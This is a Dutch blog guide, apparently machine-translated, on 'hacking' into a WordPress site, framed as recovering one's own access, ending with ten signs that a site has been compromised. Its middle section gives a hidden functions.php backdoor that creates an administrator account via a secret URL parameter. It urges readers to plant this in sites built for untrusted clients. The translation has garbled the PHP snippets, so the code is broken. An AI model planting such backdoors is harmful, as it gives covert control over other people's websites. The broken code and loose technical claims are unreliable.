Hoe te hacken op een WordPress-website, de complete gids

Hoe een WordPress-website te hacken, de complete gids


We tolereren, keuren noch moedigen illegaal of kwaadaardig gedrag aan! Het doel van dit artikel is om uit te leggen hoe je kunt hacken of weer toegang kunt krijgen tot een WordPress-site die van jou is, of die je rechten hebt om te bewerken, beheren en openen. Wat je ook doet, je doet het alleen. We zijn niet verantwoordelijk voor uw acties. Deze gids is alleen bedoeld voor educatieve doeleinden.

Beschreven methoden helpen u de toegang tot de site terug te krijgen, zelfs als u geen account meer heeft, maar hebben wat informatie over de site nodig en ze helpen u niet om een ​​willekeurige WordPress-installatie te hacken.

In deze gids gaan we u laten zien:

  • Hoe een WordPress-website te hacken
  • Hoe maak je een achterdeur in WordPress
  • Hoe maak je een nieuwe gebruikersaccount aan via FTP
  • 10 tekenen dat uw WordPress-site is gehackt

Hoe een WordPress-website te hacken, de complete gids

Situaties waarin je jezelf kunt helpen

Als u zich in een van de volgende situaties bevindt, helpen onze methoden u om weer toegang te krijgen:

  • je bent de gebruikersnaam of het e-mailadres vergeten
  • reset wachtwoordoptie werkt niet op de hostserver
  • wachtwoord opnieuw instellen e-mails komen niet door
  • je hebt geen toegang meer tot het e-mailadres van het account
  • u kent de gebruikersnaam en het wachtwoord, maar de combinatie werkt gewoon niet

Om de hieronder beschreven methoden te gebruiken, heb je nodig slechts een van de volgende:

  • FTP-toegang tot de server, of
  • cPanel-toegang tot de server, of
  • toegang tot de MySQL-database en de mogelijkheid om er op afstand verbinding mee te maken

Methode # 1 – de MySQL-manier

Gebruik deze methode om het wachtwoord (of gebruikersnaam indien nodig) van een bestaande gebruiker te wijzigen of om een ​​nieuw account aan te maken. U heeft cPanel-toegang nodig of directe MySQL-toegang tot de database van de site. Laten we beginnen door het wachtwoord van een bestaande gebruiker te wijzigen.

Als je cPanel gebruikt, log dan in (cPanel is altijd toegankelijk via de https://uwsite.com:2083 link), zoek en open phpMyAdmin. De lijst met databases en tabellen staat aan de linkerkant. U zoekt de tafel die eindigt op _gebruikers. Het zal waarschijnlijk zijn wp_users, maar als je meer dan één WordPress-site op de server hebt geïnstalleerd, moet je de juiste vinden.

De juiste tabel bevat de gebruiker die u wilt bewerken. Volg dezelfde procedure als je verbinding maakt met MySQL via een externe client zoals SQLyog. Zodra u de tabel en het daadwerkelijke gebruikersrecord heeft gevonden, is het tijd om het wachtwoord te wijzigen.

Zoals je waarschijnlijk al weet, is het wachtwoord opgeslagen in de gebruikerspas veld, gehasht met behulp van het MD5-algoritme. Open de online MD5-generator voer het wachtwoord in dat je wilt gebruiken en klik op “Hash”. Kopieer de gegenereerde string en vervang het originele wachtwoord mee. In phpMyAdmin kunt u het veld bewerken door erop te dubbelklikken. De procedure is vergelijkbaar in andere MySQL-clients. Sla wijzigingen op en log in op WordPress met uw nieuwe wachtwoord.

WP-gebruikerslijst

Gebruikersnamen, gehashte wachtwoorden en e-mails worden opgeslagen in de wp_users database tabel

Nog steeds op methode # 1 – een nieuwe gebruiker maken

Het aanmaken van een nieuwe gebruiker is wat ingewikkelder maar nog steeds beheersbaar in minder dan een minuut. Maak een nieuw record in de gebruikerstabel en vul in: user_login, user_pass (hashed, met behulp van de MD5-functie hierboven beschreven) en user_email. Alle andere velden kunnen leeg blijven; ze doen er niet toe. Sla het nieuwe record op. Eenmaal opgeslagen, geeft MySQL het een unieke ID. Het is het nummer in het ID-veld. Onthoud het.

Ga nu naar _usermeta tafel. Onthouden, het voorvoegsel van de tabel moet hetzelfde zijn als dat van de gebruikers. Bijvoorbeeld wp_users en wp_usersmeta. Als het voorvoegsel niet hetzelfde is, bewerkt u de verkeerde tabel (van een andere WP-installatie) en werkt het nieuwe account niet. We maken twee nieuwe records. Negeer de umeta_id veld voor beide. Stel gebruikersnaam veld met de waarde die u zojuist hebt onthouden (de nieuwe ID-waarde in de gebruikerstabel). Voor de eerste recordset meta_key naar wpct_user_level en meta_value naar 10. Voor de tweede meta_key naar wpct_capabilities en meta_value naar a: 1: {s: 13: "administrator"; b: 1;}. Bewaar beide. U bent klaar – inloggen!

Methode # 2 – de functies.php-manier

Deze aanpak kan worden gebruikt door functies.php te bewerken via cPanel of door hiervoor een FTP-client te gebruiken. Als u cPanel gebruikt, zoek dan Bestandsbeheer en open het. Eerst moeten we de map van het actieve thema vinden.

Ga naar public_html / wp_content / themes map. Als je je thema meteen ziet en weet welke het is – geweldig. Open de map en begin met bewerken functies.php. Zo niet, open de site, klik met de rechtermuisknop ergens en selecteer “Bron weergeven”. Druk vervolgens op Ctrl + F en begin met typen /thema's/ binnenkort heb je veel URL’s gemarkeerd en herken je de mapnaam van het actieve thema.

Vind het in de bestandsstructuur, open het en begin met bewerken functies.php. Kopieer en plak de volgende code aan het einde van het bestand. Let op de afsluiting ?> PHP-tags als je ze hebt. Ze moeten op de laatste regel staan. Dus voeg de code voor hen in.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! gebruikersnaam_bestaat ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (array ('ID' => $ user_id, 'nickname' => $ new_user_email));

$ user = new WP_User ($ user_id);
$ user-> set_role ('administrator');
}

Bewerk alleen de eerste twee regels van de code om uw nieuwe account weer te geven. Als er al een gebruiker in WP is met die e-mail, wordt er geen nieuw account gemaakt, dus zorg ervoor dat het nieuw is. Verander ook het wachtwoord – laat je niet hacken door scriptkiddies. Nadat u het bestand heeft opgeslagen, opent u eenvoudig uw site, de code wordt uitgevoerd, er wordt een nieuw account met beheerdersrechten gemaakt en u kunt ermee inloggen.

Vergeet daarna niet om de code te verwijderen functies.php.

Andere hackmethoden

Door het FTP-, cPanel- of MySQL-wachtwoord te kennen, bewijst u dat u legitiem toegangsrecht tot de server heeft en daarom ook toegang moet hebben tot de WordPress-installatie (s). Als je geen van die accounts hebt, ben je niet goed (hacking op sites van andere mensen), en dat is niet leuk!

Houd er rekening mee dat het verkrijgen van ongeoorloofde toegang tot computers, sites of servers een ernstige misdaad is en in de meeste landen onmiddellijk wordt behandeld.

Als je bang bent dat je WordPress-site kan worden gehackt, kijk dan op deze pagina met gratis WordPress-beveiligingsscanner. Als je geen tijd hebt om je blog op te zetten, laat het ons dan voor je doen.

Hoe maak je een achterdeur in WordPress

Als de voordeur gesloten is, kunt u de achterdeur proberen. Dit klinkt misschien als een kwaadaardige manier om de code te gebruiken om de site te betreden zonder er toegang toe te hebben, maar er zijn momenten waarop u uw eigen site moet beheren als iemand deze heeft gestolen.

Als het websites maakt voor andere mensen die u doet, zal er vroeg of laat een klant zijn die weigert u te betalen voor uw werk; een klant die uw inloggegevens zal verwijderen en de controle over alles wat u heeft gedaan overneemt. Soms is het voldoende om een ​​nieuwe gebruiker aan te maken via FTP of om een ​​wachtwoord opnieuw in te stellen. Als dat niet genoeg is, wilt u misschien uw weg terug hacken of een achterdeur openen voor uw beheerderspagina’s.

Maar als je besluit om een ​​klein stukje code in je WordPress-omgeving te verbergen, kun je jezelf wat waardigheid besparen en toegang krijgen tot de WordPress-site met beheerdersrechten. En daar beginnen de games.

Het maakt niet uit hoe vaak deze dief uw informatie verwijdert of een back-up herstelt op een server waarvan hij waarschijnlijk de eigenaar is, de kans bestaat dat hij niets weet over toegangen achter de deur. Als hij dat deed, had hij waarschijnlijk niet eens jouw hulp nodig bij het opzetten van WordPress, toch?

Maak een achterdeur:

OK, genoeg met het gesprek; hier is een stukje code dat je nodig hebt om de klus te klaren:

  1. Open het bestand functions.php
  2. Kopieer / plak de volgende code:
  3. add_action ('wp_head', 'wploop_backdoor');
    functie wploop_backdoor () {
    If ($ _GET ['backdoor'] == 'knockknock') {
    vereisen ('wp-include / registration.php');
    If (! Gebruikersnaam_bestaat ('gebruikersnaam')) {
    $ user_id = wp_create_user ('naam', 'doorgeven');
    $ user = new WP_User ($ user_id);
    $ user-> set_role ('administrator');
    }
    }
    }
    ?>
  4. Wijzigingen opslaan

Als u de code laat zoals deze is, hoeft u alleen maar een nieuwe beheerder op de site te maken http://www.uwdomein.com/?backdoor=knockknock

Nadat de pagina is geladen, is uw nieuwe gebruikersnaam “naam” en wachtwoord “voorbij gaan aan”.

Natuurlijk, dat kun je veranderen in de code hierboven door ‘naam’ en ‘doorgeven’ te wijzigen naar wat je maar wilt. Je kunt de link naar je achterdeur ook wijzigen door ‘achterdeur’ en / of ‘klop’ te veranderen in alles wat je verzint.

Probeer de functie – niet alleen is het leuk, maar het kan je ook echt ergens in de toekomst helpen als je op het punt staat een website te maken voor iemand die je niet helemaal kunt vertrouwen. Je moet ook je WordPress- en blogvaardigheden verbeteren.

Hoe maak je een nieuwe gebruikersaccount aan via FTP

Het maken van nieuwe gebruikersaccounts op WordPress is heel eenvoudig. Als beheerder moet je navigeer naar de admin-pagina van de gebruiker waar u voor elke gebruikersrol een nieuw account kunt maken. Dat kan binnen enkele seconden en een nieuw aangemaakte gebruiker kan onmiddellijk inloggen met een bepaalde gebruikersnaam en wachtwoord.

Maar wat gebeurt er als u de toegang tot uw WordPress-beheerder verliest? Het kan een beetje ingewikkelder worden, maar maak je geen zorgen – we hebben een functie voor je die je beheerdersleven kan redden.

Of een andere beheerder uw account nu heeft verwijderd, of u per ongeluk alle gebruikers uit de database hebt verwijderd, een defecte plug-in hebt gebruikt of bent gehackt, u kunt nog steeds de controle terugnemen. Soms krijgt u mogelijk alleen toegang tot uw FTP-server terwijl de HTTP-server buiten uw bereik is en u een nieuwe beheerder moet maken. Hoewel dat een zeldzaam geval kan zijn, zal de volgende functie u redden.

Om een ​​nieuw account aan te maken buiten de WordPress-beheeromgeving, alles wat je nodig hebt is een FTP-toegang tot je site. Als beheerder moet u over alle benodigde informatie beschikken om u aan te melden bij uw server en u kunt snel een nieuw account maken door een nieuwe functie in uw thema te maken.

Maak een nieuw gebruikersaccount aan via FTP:

  1. Open FTP-client en maak verbinding met uw account
  2. Navigeer naar wp-content / thema’s
  3. Open de map van het thema dat je gebruikt
  4. Zoek naar functions.php-bestand en bewerk het
  5. Kopieer en plak de volgende functie:
  6. functie admin_account () {
    $ user = 'Gebruikersnaam';
    $ pass = 'Wachtwoord';
    $ email = '[email protected]';
    if (! gebruikersnaam_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = new WP_User ($ user_id);
    $ user-> set_role ('administrator');
    }}
    add_action ('init', 'admin_account');
    
  7. Verander gebruikersnaam, wachtwoord en e-mail in iets unieks
  8. Wijzigingen opslaan

Zorg ervoor dat de gebruikersnaam, het wachtwoord en het e-mailadres dat u in de functie instelt, uniek zijn anders werkt de functie niet goed. Nadat u de wijzigingen heeft opgeslagen, bent u klaar en kunt u naar uw WP-inlogpaneel navigeren. Gebruik nieuwe informatie om weer in te loggen en zodra u het account hebt geverifieerd, kunt u de functie verwijderen uit het bestand functions.php.

De hierboven weergegeven functie maakt een beheerdersaccount aan, maar u kunt deze eenvoudig wijzigen om een ​​account met een andere gebruikersrol te maken. Simpel verander de rol op de 8th rij van de code aan de redacteur, auteur, bijdrager, abonnee of enige andere gebruikersrol die u hebt gemaakt.

Helaas, als u uw beheerdersaccount bent kwijtgeraakt, bent u ook alle berichten kwijt die onder die gebruikersnaam zijn geschreven. Daarom moet u altijd een back-up bewaren die u gemakkelijk kunt terugvinden. Als je dit leest terwijl je je beheerdersaccount hebt, neem dit als herinnering om onmiddellijk een back-up te maken en bookmark dit artikel voor het geval u in de toekomst een account buiten WordPress moet maken.

10 tekenen dat uw WordPress-site is gehackt

WordPress is een enorm blogplatform. Er zijn miljoenen gebruikers en het lijkt erop dat het aantal elke dag snel groeit. Mensen hebben de neiging om hun websites die in andere contentbeheersystemen zijn gemaakt, vaker over te zetten naar dit open source-systeem dan u misschien denkt. En hoewel dit goed is, betekent dit dat hackers zullen WordPress ook op nummer één plaatsen wanneer ze proberen willekeurige sites binnen te vallen.

Als u wordt gehackt, weet u dat meestal meteen. Uw site wordt ontoegankelijk; je kunt niet inloggen en soms laat een hacker zelfs een bericht achter op de voorpagina. Maar vaker wel dan niet, je merkt misschien niet eens dat er iets is veranderd. In dit deel van het artikel staan ​​we op het punt u verschillende tekenen te laten zien die kunnen aantonen dat uw WordPress-site is gehackt en een paar oplossingen voor het probleem.

1. Mislukte login

Dit teken is vrij duidelijk. Als je al een tijdje een combinatie van gebruikersnaam en wachtwoord hebt gebruikt zonder ooit problemen te hebben, kun je argwaan krijgen als WordPress plotseling je account niet herkent. Als een hacker op uw site moet inloggen, is de kans groot dat hij snel uw beheerdersrechten zal wijzigen.

Misschien heeft hij uw wachtwoord moeten wijzigen of heeft hij uw account volledig verwijderd. Voordat u in paniek raakt nadat WordPress u voor het eerst berichten heeft gestuurd over een onjuiste gebruikersnaam / wachtwoord, moet u er rekening mee houden dat u mogelijk een verkeerde combinatie heeft ingevoerd of dat u de caps lock-knop heeft ingeschakeld.

Oplossing: Probeer het wachtwoord via e-mail te herstellen of gebruik een ander account om weer in te loggen. Om er zeker van te zijn dat je blijft inloggen, raden we aan te installeren Login Ninja plugin voor WordPress.

2. Schadelijke inhoud wordt aan uw site toegevoegd

Site bevat een malware-waarschuwing

Als u onbekende inhoud op uw site opmerkt, kunt u zich zorgen gaan maken. Wanneer ze de kans krijgen om toegang te krijgen tot uw admin-gebied, hackers kunnen uw kern en zowel uw thema- als plug-inbestanden wijzigen. Dat betekent dat ze alles kunnen veranderen wat ze willen.

Hoewel sommige hackers het uiterlijk van uw site drastisch zullen wijzigen en misschien zelfs zullen spellen dat u bent gehackt, zullen de andere er veel subtieler over zijn.

Oplossing: Zoek naar verborgen inhoud in de websitecode. Er kunnen links zijn naar kwaadwillende sites die hackers in de voettekst van uw site hebben geplant, of ze hebben pop-ups geïnstalleerd die regelmatig voor uw klanten worden geopend. Gebruik Security Ninja om uw site te scannen of controleer uw site continu op dergelijke problemen.

3. Verdachte bezoeken

Als u uw website niet bijhoudt, moet u dit onmiddellijk doen. Een eenvoudige manier om dit te doen, is door Google Analytics te gebruiken, dat u onder andere kan vertellen hoeveel bezoeken u krijgt en waar die bezoeken vandaan komen. Na enige tijd leert u uw website kennen. Dat betekent dat u weet waar de bezoeken vandaan komen, u weet wanneer u een nieuwe campagne start en wanneer er nieuwe promotielinks in het wild worden vrijgegeven.

Maar als u plotseling merkt dat uw site een groot aantal nieuwe bezoeken krijgt van het verdachte domein, u wilt dit verder onderzoeken omdat uw site mogelijk wordt gehackt. Meestal resulteert dat soort bezoeken in een bouncepercentage van 100%, wat betekent dat er slechts één pagina is bezocht. Hackers gebruiken vaak geautomatiseerde systemen die andere slechte sites naar de uwe leiden. Of het nu gaat om de slechte code die op uw site wordt uitgevoerd of u bent onderdeel geworden van een spamnetwerk, dingen kunnen ernstig worden en u zult uw site moeten controleren op schadelijke code.

Oplossing: Gebruik Google Webmasters Tools om verdachte domeinen te vinden

4. Een plotselinge daling van het verkeer

Veilig browsen Ssite-status

In tegenstelling tot het laatst genoemde teken dat u wordt gehackt, kan deze u waarschuwen omdat het aantal bezoeken plotseling afneemt. In plaats van nieuwe bezoeken aan u door te verwijzen, een hacker kan bezoeken buiten uw site verzenden. Dit kan gebeuren omdat een hacker uw site heeft omgeleid naar een andere. De andere reden om minder bezoekers te krijgen, is dat Google uw site op de zwarte lijst heeft gezet. Met deze actie wordt een bericht weergegeven aan elke gebruiker die ervoor kan kiezen uw site niet te openen omdat deze is geïnfecteerd.

Oplossing: Gebruik Google’s Safe Browsing Site Status om te controleren of uw site als onveilig is gemarkeerd en momenteel gevaarlijk is om te bezoeken.

5. De resultaten van zoekmachines zijn vreemd

Als u geen wijzigingen op uw site heeft opgemerkt, maar u ontdekt dat zoekresultaten in Google en andere zoekmachines vreemd zijn (verschillende titels en andere metagegevens weergeven), kan dit een duidelijk teken zijn van een gehackte site. Mogelijk heeft een hacker uw inhoud gewijzigd op een manier die alleen zichtbaar is voor een expert. Toch zou de verandering zichtbaar zijn in de resultaten van de zoekmachine.

Oplossing: Controleer uw site met Google Webmasters Tools, en controleer of uw site hiermee is gehackt gratis online tool.

6. Je kunt geen e-mails verzenden / ontvangen

Zodra een hacker toegang krijgt tot uw site, zal hij dat waarschijnlijk ook willen gebruik uw server om iedereen te spammen. Wanneer u ontdekt dat u geen nieuwe e-mails van uw WordPress kunt verzenden of ontvangen, kan dit een duidelijk teken zijn dat u bent gehackt. Controleer uw e-mail nogmaals en controleer deze vervolgens bij uw provider om er zeker van te zijn dat er geen fouten zijn.

Oplossing: Test uw WordPress mail functie met deze gratis plug-in.

7. Site bestaat niet

Server niet gevonden

Soms hebben hackers geen toegang tot uw site om schadelijke code te plaatsen, gebruikers om te leiden of uw e-mail te gebruiken voor spam. Soms, het enige wat ze willen doen is uw site laten crashen. Zelden zal een hacker alles met succes van de hele server verwijderen. Daarom is het belangrijk dat u uw bestanden host bij een gerenommeerd hostingbedrijf dat de beveiliging op zich neemt en ook dagelijkse of op zijn minst wekelijkse back-ups van uw website maakt. Het is een goede gewoonte dat u van tijd tot tijd ook uw eigen back-ups maakt, zodat de site snel kan worden hersteld.

Oplossing: Installeer een van de beste plug-ins voor back-upbeheer in WordPress.

8. Verdachte bestanden

Vergelijkbaar met kwaadaardige inhoud die aan bestaande bestanden kan worden toegevoegd, een hacker kan overal in uw root-map extra bestanden plaatsen. Het is een goede zaak om uw weg in WordPress te kennen, maar als u niet zo ervaren bent, zou u over een beveiligingstool moeten beschikken die al uw bestanden en activiteiten kan controleren. Onlangs hebben we de Security Ninja beoordeeld, een perfect hulpmiddel om al uw WordPress-bestanden te controleren.

Oplossing: Zoek naar bestanden die niet bij uw WordPress-installatie horen. Gebruik Security Ninja om uw site regelmatig te scannen en die bestanden automatisch te vinden. Verwijder vervolgens de bestanden of verwijder de schadelijke code uit geïnfecteerde bestanden. Vergeet de add-on Core Scanner voor Security Ninja niet.

9. Nieuwe leden

Afhankelijk van uw site bent u mogelijk de enige die nieuwe leden kan toevoegen. In dat geval kan een e-mail met informatie over nieuw geregistreerde gebruikers een alarm veroorzaken. Als er andere beheerders zijn die de mogelijkheid hebben om nieuwe leden toe te voegen, neem dan contact met hen op over verdachte activiteiten.

Oplossing: Wijzig de inlog-URL met een gratis plug-in, beperk de toegang tot uw WordPress-inlogpagina door het .htpasswd-bestand te gebruiken en gebruik Login Ninja om uw inlogformulier de hele tijd te beschermen.

10. Bekijk geplande evenementen op uw server

Soms doet een hacker niets met uw website als hij eenmaal zijn weg heeft gevonden. In plaats daarvan, ze zullen geplande evenementen verlaten die uw site ergens in de toekomst kunnen beschadigen. Deze techniek is gevaarlijk omdat een hacker in eerste instantie een onervaren slachtoffer geen idee kan geven. U bent mogelijk besmet en weet er niets van af.

Oplossing: Controleer uw CRON-taken op een server die u gebruikt en zorg ervoor dat er geen verdachte geplande taken zijn.

Afsluiten

We hopen dat dit artikel je zal helpen om zelfs een veiligere WordPress-site te beheren en dat het je zal helpen er weer toegang toe te krijgen in slechte situaties. En zelfs als je site schoon is, neem dat dan niet voor lief.
Zorg er altijd voor dat je blog zo veilig mogelijk is. We raden beveiligingsplug-ins voor WordPress aan die u meestal kunnen redden. Maar wees niet degene die een onveilig wachtwoord gebruikt en wees voorzichtig bij het hacken van uw eigen WordPress-site.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map